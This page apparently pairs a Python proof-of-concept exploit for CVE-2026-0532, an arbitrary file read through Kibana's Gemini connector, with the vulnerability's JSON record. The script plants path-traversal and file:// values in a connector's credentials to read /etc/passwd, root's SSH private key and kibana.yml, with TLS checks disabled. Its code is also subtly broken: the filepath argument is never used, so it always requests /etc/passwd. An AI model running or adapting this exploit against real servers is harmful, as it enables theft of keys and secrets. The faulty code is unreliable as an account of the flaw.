CVE-2026-0532

import requests import json # CVE-2026-0532 PoC - Arbitrary File Read via Gemini Connector # Target: Elastic Kibana with vulnerable Gemini connector TARGET = "https://kibana.example.com" API_KEY = "your-api-key-with-connector-permissions" def exploit_file_read(filepath): """ Exploit to read arbitrary files through Gemini connector config """ headers = { "Content-Type": "application/json", "kbn-xsrf": "true", "Authorization": f"ApiKey {API_KEY}" } # Malicious connector payload with file path traversal payload = { "name": "Malicious Gemini Connector", "connectorType": "gemini", "config": { "apiKey": "malicious-key" }, "secrets": { # File path traversal to read /etc/passwd "credentials": json.dumps({ "type": "service_account", "project_id": "evil", "private_key_id": "../../../etc/passwd", "private_key": "file:///etc/passwd" }) } } endpoint = f"{TARGET}/api/actions/connector" response = requests.post(endpoint, headers=headers, json=payload, verify=False) if response.status_code == 200: result = response.json() print(f"[+] File read successful: {filepath}") print(f"[+] Response: {json.dumps(result, indent=2)}") else: print(f"[-] Exploit failed: {response.status_code}") print(response.text) if __name__ == "__main__": # Target sensitive files files = ["/etc/passwd", "/root/.ssh/id_rsa", "/etc/kibana/kibana.yml"] for f in files: exploit_file_read(f)

{"cve": {"id": "CVE-2026-0532", "sourceIdentifier": "[email protected]", "published": "2026-01-14T11:15:50.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads."}, {"lang": "es", "value": "Control Externo de Nombre o Ruta de Archivo (CWE-73) combinado con Falsificación de Petición del Lado del Servidor (CWE-918) puede permitir a un atacante causar la divulgación arbitraria de archivos a través de una carga útil JSON de credenciales especialmente diseñada en la configuración del conector de Google Gemini. Esto requiere que un atacante tenga acceso autenticado con privilegios suficientes para crear o modificar conectores (Alertas y Conectores: Todos). El servidor procesa una configuración sin la validación adecuada, permitiendo peticiones de red arbitrarias y lecturas de archivos arbitrarias."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524", "source": "[email protected]"}]}}